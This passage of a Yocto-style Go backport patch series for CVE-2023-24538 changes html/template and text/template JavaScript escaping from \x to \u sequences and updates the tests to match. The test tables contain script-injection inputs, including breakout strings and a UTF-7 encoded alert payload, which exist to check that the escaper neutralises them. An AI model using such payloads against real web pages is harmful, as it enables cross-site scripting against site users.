63 `greeting=H%69,&amp;addressee=(World)`,
64 `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
65 `,foo/,`,
66@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
67 `Hello,&#32;World&#32;&amp;tc!`,
68 `&#32;dir&#61;&#34;ltr&#34;`,
69 `c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
70- `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
71+ `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
72 `greeting&#61;H%69,&amp;addressee&#61;(World)`,
73 `greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
74 `,foo/,`,
75@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
76 `Hello, World &amp;tc!`,
77 ` dir=&#34;ltr&#34;`,
78 `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
79- `Hello, World &amp; O&#39;Reilly\x21`,
80+ `Hello, World &amp; O&#39;Reilly\u0021`,
81 `greeting=H%69,&amp;addressee=(World)`,
82 `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
83 `,foo/,`,
84@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
85 `Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
86 ` dir=&#34;ltr&#34;`,
87 `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
88- `Hello, World &amp; O&#39;Reilly\x21`,
89+ `Hello, World &amp; O&#39;Reilly\u0021`,
90 `greeting=H%69,&amp;addressee=(World)`,
91 `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
92 `,foo/,`,
93@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
94 // Not escaped.
95 `c && alert("Hello, World!");`,
96 // Escape sequence not over-escaped.
97- `"Hello, World & O'Reilly\x21"`,
98+ `"Hello, World & O'Reilly\u0021"`,
99 `"greeting=H%69,\u0026addressee=(World)"`,
100 `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
101 `",foo/,"`,
102@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
103 // Not JS escaped but HTML escaped.
104 `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
105 // Escape sequence not over-escaped.
106- `&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
107+ `&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
108 `&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
109 `&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
110 `&#34;,foo/,&#34;`,
111@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
112 {
113 `<script>alert("{{.}}")</script>`,
114 []string{
115- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
116- `a[href =~ \x22\/\/example.com\x22]#foo`,
117- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
118- ` dir=\x22ltr\x22`,
119- `c \x26\x26 alert(\x22Hello, World!\x22);`,
120+ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
121+ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
122+ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
123+ ` dir=\u0022ltr\u0022`,
124+ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
125 // Escape sequence not over-escaped.
126- `Hello, World \x26 O\x27Reilly\x21`,
127- `greeting=H%69,\x26addressee=(World)`,
128- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
129+ `Hello, World \u0026 O\u0027Reilly\u0021`,
130+ `greeting=H%69,\u0026addressee=(World)`,
131+ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
132 `,foo\/,`,
133 },
134 },
135 {
136 `<script type="text/javascript">alert("{{.}}")</script>`,
137 []string{
138- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
139- `a[href =~ \x22\/\/example.com\x22]#foo`,
140- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
141- ` dir=\x22ltr\x22`,
142- `c \x26\x26 alert(\x22Hello, World!\x22);`,
143+ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
144+ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
145+ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
146+ ` dir=\u0022ltr\u0022`,
147+ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
148 // Escape sequence not over-escaped.
149- `Hello, World \x26 O\x27Reilly\x21`,
150- `greeting=H%69,\x26addressee=(World)`,
151- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
152+ `Hello, World \u0026 O\u0027Reilly\u0021`,
153+ `greeting=H%69,\u0026addressee=(World)`,
154+ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
155 `,foo\/,`,
156 },
157 },
158@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
159 // Not escaped.
160 `c && alert("Hello, World!");`,
161 // Escape sequence not over-escaped.
162- `"Hello, World & O'Reilly\x21"`,
163+ `"Hello, World & O'Reilly\u0021"`,
164 `"greeting=H%69,\u0026addressee=(World)"`,
165 `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
166 `",foo/,"`,
167@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
168 `Hello, <b>World</b> &amp;tc!`,
169 ` dir=&#34;ltr&#34;`,
170 `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
171- `Hello, World &amp; O&#39;Reilly\x21`,
172+ `Hello, World &amp; O&#39;Reilly\u0021`,
173 `greeting=H%69,&amp;addressee=(World)`,
174 `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
175 `,foo/,`,
176@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
177 {
178 `<button onclick='alert("{{.}}")'>`,
179 []string{
180- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
181- `a[href =~ \x22\/\/example.com\x22]#foo`,
182- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
183- ` dir=\x22ltr\x22`,
184- `c \x26\x26 alert(\x22Hello, World!\x22);`,
185+ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
186+ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
187+ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
188+ ` dir=\u0022ltr\u0022`,
189+ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
190 // Escape sequence not over-escaped.
191- `Hello, World \x26 O\x27Reilly\x21`,
192- `greeting=H%69,\x26addressee=(World)`,
193- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
194+ `Hello, World \u0026 O\u0027Reilly\u0021`,
195+ `greeting=H%69,\u0026addressee=(World)`,
196+ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
197 `,foo\/,`,
198 },
199 },
200@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
201 `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
202 `%20dir%3d%22ltr%22`,
203 `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
204- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
205+ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
206 // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
207 `greeting=H%69,&amp;addressee=%28World%29`,
208 `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
209@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
210 `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
211 `%20dir%3d%22ltr%22`,
212 `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
213- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
214+ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
215 // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
216 `greeting=H%69,&addressee=%28World%29`,
217 `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
218diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
219index e72a9ba..c709660 100644
220--- a/src/html/template/escape_test.go
221+++ b/src/html/template/escape_test.go
222@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
223 {
224 "jsStr",
225 "<button onclick='alert(&quot;{{.H}}&quot;)'>",
226- `<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
227+ `<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
228 },
229 {
230 "badMarshaler",
231@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
232 {
233 "jsRe",
234 `<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
235- `<button onclick='alert(/foo\x2bbar/.test(""))'>`,
236+ `<button onclick='alert(/foo\u002bbar/.test(""))'>`,
237 },
238 {
239 "jsReBlank",
240@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
241 "main": `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
242 "helper": `{{11}} of {{"<100>"}}`,
243 },
244- `<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
245+ `<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
246 },
247 // A non-recursive template that ends in a different context.
248 // helper starts in jsCtxRegexp and ends in jsCtxDivOp.
249diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
250index 9d965f1..6cf936f 100644
251--- a/src/html/template/example_test.go
252+++ b/src/html/template/example_test.go
253@@ -116,9 +116,9 @@ func Example_escape() {
254 // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
255 // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
256 // &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
257- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
258- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
259- // \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
260+ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
261+ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
262+ // \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
263 // %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
264
265 }
266diff --git a/src/html/template/js.go b/src/html/template/js.go
267index 0e91458..ea9c183 100644
268--- a/src/html/template/js.go
269+++ b/src/html/template/js.go
270@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
271 }
272 // TODO: detect cycles before calling Marshal which loops infinitely on
273 // cyclic data. This may be an unacceptable DoS risk.
274-
275 b, err := json.Marshal(a)
276 if err != nil {
277 // Put a space before comment so that if it is flush against
278@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
279 // TODO: maybe post-process output to prevent it from containing
280 // "<!--", "-->", "<![CDATA[", "]]>", or "</script"
281 // in case custom marshalers produce output containing those.
282-
283- // TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
284+ // Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
285+ // supports ld+json content-type.
286 if len(b) == 0 {
287 // In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
288 // not cause the output `x=y/*z`.
289@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
290 r, w = utf8.DecodeRuneInString(s[i:])
291 var repl string
292 switch {
293+ case int(r) < len(lowUnicodeReplacementTable):
294+ repl = lowUnicodeReplacementTable[r]
295 case int(r) < len(replacementTable) && replacementTable[r] != "":
296 repl = replacementTable[r]
297 case r == '\u2028':
298@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
299 return b.String()
300 }
301
302+var lowUnicodeReplacementTable = []string{
303+ 0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
304+ '\a': `\u0007`,
305+ '\b': `\u0008`,
306+ '\t': `\t`,
307+ '\n': `\n`,
308+ '\v': `\u000b`, // "\v" == "v" on IE 6.
309+ '\f': `\f`,
310+ '\r': `\r`,
311+ 0xe: `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
312+ 0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
313+ 0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
314+}
315+
316 var jsStrReplacementTable = []string{
317- 0: `\0`,
318+ 0: `\u0000`,
319 '\t': `\t`,
320 '\n': `\n`,
321- '\v': `\x0b`, // "\v" == "v" on IE 6.
322+ '\v': `\u000b`, // "\v" == "v" on IE 6.
323 '\f': `\f`,
324 '\r': `\r`,
325 // Encode HTML specials as hex so the output can be embedded
326 // in HTML attributes without further encoding.
327- '"': `\x22`,
328- '&': `\x26`,
329- '\'': `\x27`,
330- '+': `\x2b`,
331+ '"': `\u0022`,
332+ '&': `\u0026`,
333+ '\'': `\u0027`,
334+ '+': `\u002b`,
335 '/': `\/`,
336- '<': `\x3c`,
337- '>': `\x3e`,
338+ '<': `\u003c`,
339+ '>': `\u003e`,
340 '\\': `\\`,
341 }
342
343 // jsStrNormReplacementTable is like jsStrReplacementTable but does not
344 // overencode existing escapes since this table has no entry for `\`.
345 var jsStrNormReplacementTable = []string{
346- 0: `\0`,
347+ 0: `\u0000`,
348 '\t': `\t`,
349 '\n': `\n`,
350- '\v': `\x0b`, // "\v" == "v" on IE 6.
351+ '\v': `\u000b`, // "\v" == "v" on IE 6.
352 '\f': `\f`,
353 '\r': `\r`,
354 // Encode HTML specials as hex so the output can be embedded
355 // in HTML attributes without further encoding.
356- '"': `\x22`,
357- '&': `\x26`,
358- '\'': `\x27`,
359- '+': `\x2b`,
360+ '"': `\u0022`,
361+ '&': `\u0026`,
362+ '\'': `\u0027`,
363+ '+': `\u002b`,
364 '/': `\/`,
365- '<': `\x3c`,
366- '>': `\x3e`,
367+ '<': `\u003c`,
368+ '>': `\u003e`,
369 }
370-
371 var jsRegexpReplacementTable = []string{
372- 0: `\0`,
373+ 0: `\u0000`,
374 '\t': `\t`,
375 '\n': `\n`,
376- '\v': `\x0b`, // "\v" == "v" on IE 6.
377+ '\v': `\u000b`, // "\v" == "v" on IE 6.
378 '\f': `\f`,
379 '\r': `\r`,
380 // Encode HTML specials as hex so the output can be embedded
381 // in HTML attributes without further encoding.
382- '"': `\x22`,
383+ '"': `\u0022`,
384 '$': `\$`,
385- '&': `\x26`,
386- '\'': `\x27`,
387+ '&': `\u0026`,
388+ '\'': `\u0027`,
389 '(': `\(`,
390 ')': `\)`,
391 '*': `\*`,
392- '+': `\x2b`,
393+ '+': `\u002b`,
394 '-': `\-`,
395 '.': `\.`,
396 '/': `\/`,
397- '<': `\x3c`,
398- '>': `\x3e`,
399+ '<': `\u003c`,
400+ '>': `\u003e`,
401 '?': `\?`,
402 '[': `\[`,
403 '\\': `\\`,
404diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
405index 075adaa..d7ee47b 100644
406--- a/src/html/template/js_test.go
407+++ b/src/html/template/js_test.go
408@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
409 {"foo", `"foo"`},
410 // Newlines.
411 {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
412- // "\v" == "v" on IE 6 so use "\x0b" instead.
413+ // "\v" == "v" on IE 6 so use "\u000b" instead.
414 {"\t\x0b", `"\t\u000b"`},
415 {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
416 {[]interface{}{}, "[]"},
417@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
418 }{
419 {"", ``},
420 {"foo", `foo`},
421- {"\u0000", `\0`},
422+ {"\u0000", `\u0000`},
423 {"\t", `\t`},
424 {"\n", `\n`},
425 {"\r", `\r`},
426@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
427 {"\\n", `\\n`},
428 {"foo\r\nbar", `foo\r\nbar`},
429 // Preserve attribute boundaries.
430- {`"`, `\x22`},
431- {`'`, `\x27`},
432+ {`"`, `\u0022`},
433+ {`'`, `\u0027`},
434 // Allow embedding in HTML without further escaping.
435- {`&amp;`, `\x26amp;`},
436+ {`&amp;`, `\u0026amp;`},
437 // Prevent breaking out of text node and element boundaries.
438- {"</script>", `\x3c\/script\x3e`},
439- {"<![CDATA[", `\x3c![CDATA[`},
440- {"]]>", `]]\x3e`},
441+ {"</script>", `\u003c\/script\u003e`},
442+ {"<![CDATA[", `\u003c![CDATA[`},
443+ {"]]>", `]]\u003e`},
444 // https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
445 // "The text in style, script, title, and textarea elements
446 // must not have an escaping text span start that is not
447@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
448 // allow regular text content to be interpreted as script
449 // allowing script execution via a combination of a JS string
450 // injection followed by an HTML text injection.
451- {"<!--", `\x3c!--`},
452- {"-->", `--\x3e`},
453+ {"<!--", `\u003c!--`},
454+ {"-->", `--\u003e`},
455 // From https://code.google.com/p/doctype/wiki/ArticleUtf7
456 {"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
457- `\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
458+ `\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
459 },
460 // Invalid UTF-8 sequence
461 {"foo\xA0bar", "foo\xA0bar"},
462@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
463 }{
464 {"", `(?:)`},
465 {"foo", `foo`},
466- {"\u0000", `\0`},
467+ {"\u0000", `\u0000`},
468 {"\t", `\t`},
469 {"\n", `\n`},
470 {"\r", `\r`},
471@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
472 {"\\n", `\\n`},
473 {"foo\r\nbar", `foo\r\nbar`},
474 // Preserve attribute boundaries.
475- {`"`, `\x22`},
476- {`'`, `\x27`},
477+ {`"`, `\u0022`},
478+ {`'`, `\u0027`},
479 // Allow embedding in HTML without further escaping.
480- {`&amp;`, `\x26amp;`},
481+ {`&amp;`, `\u0026amp;`},
482 // Prevent breaking out of text node and element boundaries.
483- {"</script>", `\x3c\/script\x3e`},
484- {"<![CDATA[", `\x3c!\[CDATA\[`},
485- {"]]>", `\]\]\x3e`},
486+ {"</script>", `\u003c\/script\u003e`},
487+ {"<![CDATA[", `\u003c!\[CDATA\[`},
488+ {"]]>", `\]\]\u003e`},
489 // Escaping text spans.
490- {"<!--", `\x3c!\-\-`},
491- {"-->", `\-\-\x3e`},
492+ {"<!--", `\u003c!\-\-`},
493+ {"-->", `\-\-\u003e`},
494 {"*", `\*`},
495- {"+", `\x2b`},
496+ {"+", `\u002b`},
497 {"?", `\?`},
498 {"[](){}", `\[\]\(\)\{\}`},
499 {"$foo|x.y", `\$foo\|x\.y`},
500@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
501 {
502 "jsStrEscaper",
503 jsStrEscaper,
504- "\\0\x01\x02\x03\x04\x05\x06\x07" +
505- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
506- "\x10\x11\x12\x13\x14\x15\x16\x17" +
507- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
508- ` !\x22#$%\x26\x27()*\x2b,-.\/` +
509- `0123456789:;\x3c=\x3e?` +
510+ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
511+ `\u0008\t\n\u000b\f\r\u000e\u000f` +
512+ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
513+ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
514+ ` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
515+ `0123456789:;\u003c=\u003e?` +
516 `@ABCDEFGHIJKLMNO` +
517 `PQRSTUVWXYZ[\\]^_` +
518 "`abcdefghijklmno" +
519- "pqrstuvwxyz{|}~\x7f" +
520+ "pqrstuvwxyz{|}~\u007f" +
521 "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
522 },
523 {
524 "jsRegexpEscaper",
525 jsRegexpEscaper,
526- "\\0\x01\x02\x03\x04\x05\x06\x07" +
527- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
528- "\x10\x11\x12\x13\x14\x15\x16\x17" +
529- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
530- ` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
531- `0123456789:;\x3c=\x3e\?` +
532+ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
533+ `\u0008\t\n\u000b\f\r\u000e\u000f` +
534+ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
535+ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
536+ ` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
537+ `0123456789:;\u003c=\u003e\?` +
538 `@ABCDEFGHIJKLMNO` +
539 `PQRSTUVWXYZ\[\\\]\^_` +
540 "`abcdefghijklmno" +
541diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
542index 13e6ba4..86bd4db 100644
543--- a/src/html/template/template_test.go
544+++ b/src/html/template/template_test.go
545@@ -6,6 +6,7 @@ package template_test
546
547 import (
548 "bytes"
549+ "encoding/json"
550 . "html/template"
551 "strings"
552 "testing"
553@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
554 c.mustExecute(c.root, nil, "12.34 7.5")
555 }
556
557+func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
558+ // See #33671 and #37634 for more context on this.
559+ tests := []struct{ name, in string }{
560+ {"empty", ""},
561+ {"invalid", string(rune(-1))},
562+ {"null", "\u0000"},
563+ {"unit separator", "\u001F"},
564+ {"tab", "\t"},
565+ {"gt and lt", "<>"},
566+ {"quotes", `'"`},
567+ {"ASCII letters", "ASCII letters"},
568+ {"Unicode", "ʕ⊙ϖ⊙ʔ"},
569+ {"Pizza", "P"},
570+ }
571+ const (
572+ prefix = `<script type="application/ld+json">`
573+ suffix = `</script>`
574+ templ = prefix + `"{{.}}"` + suffix
575+ )
576+ tpl := Must(New("JS string is JSON string").Parse(templ))
577+ for _, tt := range tests {
578+ t.Run(tt.name, func(t *testing.T) {
579+ var buf bytes.Buffer
580+ if err := tpl.Execute(&buf, tt.in); err != nil {
581+ t.Fatalf("Cannot render template: %v", err)
582+ }
583+ trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
584+ var got string
585+ if err := json.Unmarshal(trimmed, &got); err != nil {
586+ t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
587+ }
588+ if got != tt.in {
589+ t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
590+ }
591+ })
592+ }
593+}
594+
595 type testCase struct {
596 t *testing.T
597 root *Template
598diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
599index 77294ed..b8a809e 100644
600--- a/src/text/template/exec_test.go
601+++ b/src/text/template/exec_test.go
602@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
603 {`Go "jump" \`, `Go \"jump\" \\`},
604 {`Yukihiro says "今日は世界"`, `Yukihiro says \"今日は世界\"`},
605 {"unprintable \uFDFF", `unprintable \uFDFF`},
606- {`<html>`, `\x3Chtml\x3E`},
607- {`no = in attributes`, `no \x3D in attributes`},
608- {`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
609+ {`<html>`, `\u003Chtml\u003E`},
610+ {`no = in attributes`, `no \u003D in attributes`},
611+ {`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
612 }
613 for _, tc := range testCases {
614 s := JSEscapeString(tc.in)
615diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
616index 46125bc..f3de9fb 100644
617--- a/src/text/template/funcs.go
618+++ b/src/text/template/funcs.go
619@@ -640,10 +640,10 @@ var (
620 jsBackslash = []byte(`\\`)
621 jsApos = []byte(`\'`)
622 jsQuot = []byte(`\"`)
623- jsLt = []byte(`\x3C`)
624- jsGt = []byte(`\x3E`)
625- jsAmp = []byte(`\x26`)
626- jsEq = []byte(`\x3D`)
627+ jsLt = []byte(`\u003C`)
628+ jsGt = []byte(`\u003E`)
629+ jsAmp = []byte(`\u0026`)
630+ jsEq = []byte(`\u003D`)
631 )
632
633 // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
634--
6352.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
1From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
2From: Ariel Mashraki <ariel@mashraki.co.il>
3Date: Wed, 22 Apr 2020 22:17:56 +0300
4Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Fixes #34652
10
11Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
12Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
13Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
14Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
15TryBot-Result: Gobot Gobot <gobot@golang.org>
16
17Dependency Patch #3
18
19Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
20CVE: CVE-2023-24538
21Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
22---
23 api/next.txt | 19 +++++++++++++++++++
24 src/html/template/escape.go | 2 ++
25 src/html/template/template_test.go | 16 ++++++++++++++++
26 src/text/template/exec.go | 1 +
27 src/text/template/parse/lex.go | 8 +++++++-
28 src/text/template/parse/lex_test.go | 7 +++++--
29 src/text/template/parse/node.go | 33 +++++++++++++++++++++++++++++++++
30 src/text/template/parse/parse.go | 22 +++++++++++++++++++---
31 src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
32 9 files changed, 127 insertions(+), 6 deletions(-)
33
34diff --git a/api/next.txt b/api/next.txt
35index e69de29..076f39e 100644
36--- a/api/next.txt
37+++ b/api/next.txt
38@@ -0,0 +1,19 @@
39+pkg unicode, const Version = "13.0.0"
40+pkg unicode, var Chorasmian *RangeTable
41+pkg unicode, var Dives_Akuru *RangeTable
42+pkg unicode, var Khitan_Small_Script *RangeTable
43+pkg unicode, var Yezidi *RangeTable
44+pkg text/template/parse, const NodeComment = 20
45+pkg text/template/parse, const NodeComment NodeType
46+pkg text/template/parse, const ParseComments = 1
47+pkg text/template/parse, const ParseComments Mode
48+pkg text/template/parse, method (*CommentNode) Copy() Node
49+pkg text/template/parse, method (*CommentNode) String() string
50+pkg text/template/parse, method (CommentNode) Position() Pos
51+pkg text/template/parse, method (CommentNode) Type() NodeType
52+pkg text/template/parse, type CommentNode struct
53+pkg text/template/parse, type CommentNode struct, Text string
54+pkg text/template/parse, type CommentNode struct, embedded NodeType
55+pkg text/template/parse, type CommentNode struct, embedded Pos
56+pkg text/template/parse, type Mode uint
57+pkg text/template/parse, type Tree struct, Mode Mode
58diff --git a/src/html/template/escape.go b/src/html/template/escape.go
59index f12dafa..8739735 100644
60--- a/src/html/template/escape.go
61+++ b/src/html/template/escape.go
62@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
63 switch n := n.(type) {
64 case *parse.ActionNode:
65 return e.escapeAction(c, n)
66+ case *parse.CommentNode:
67+ return c
68 case *parse.IfNode:
69 return e.escapeBranch(c, &n.BranchNode, "if")
70 case *parse.ListNode:
71diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
72index 86bd4db..1f2c888 100644
73--- a/src/html/template/template_test.go
74+++ b/src/html/template/template_test.go
75@@ -10,6 +10,7 @@ import (
76 . "html/template"
77 "strings"
78 "testing"
79+ "text/template/parse"
80 )
81
82 func TestTemplateClone(t *testing.T) {
83@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
84 }
85 }
86
87+func TestSkipEscapeComments(t *testing.T) {
88+ c := newTestCase(t)
89+ tr := parse.New("root")
90+ tr.Mode = parse.ParseComments
